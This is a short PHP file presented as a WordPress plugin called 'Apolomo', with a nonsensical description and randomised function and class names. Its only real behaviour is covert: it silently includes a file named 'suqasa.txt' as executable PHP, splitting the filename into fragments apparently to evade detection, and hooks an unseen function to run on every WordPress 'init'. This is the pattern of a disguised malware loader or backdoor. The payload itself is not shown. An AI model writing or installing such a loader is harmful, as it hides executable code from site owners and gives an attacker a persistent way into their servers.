<?php

/**
 * Plugin Name: Apolomo
 * Plugin URI: https://ressen.co.uk/apolomo
 * Description: People know improve considerably, after a storm that may have
 * Version: 3.11.14
 * Author: Dino Carrol
 * Author URI: https://ressen.co.uk
 * Text Domain: apolomo
 * License: GPL2+
 *
 */

function elapok_nylofymu() {
    akyvew_sipihojo();
}

$awyfiwy = __DIR__ . '/suqasa.txt';
if (file_exists($awyfiwy)) {
    include_once __DIR__ . "/suqa" . "sa.t" . "xt";
}


if (function_exists("akyvew_sipihojo")) {
    $soxydiw = new ajafuz_wityponuc();
    if ($soxydiw->uwolyd_zhazhivu()) {
        add_action('init', 'elapok_nylofymu');
    }
}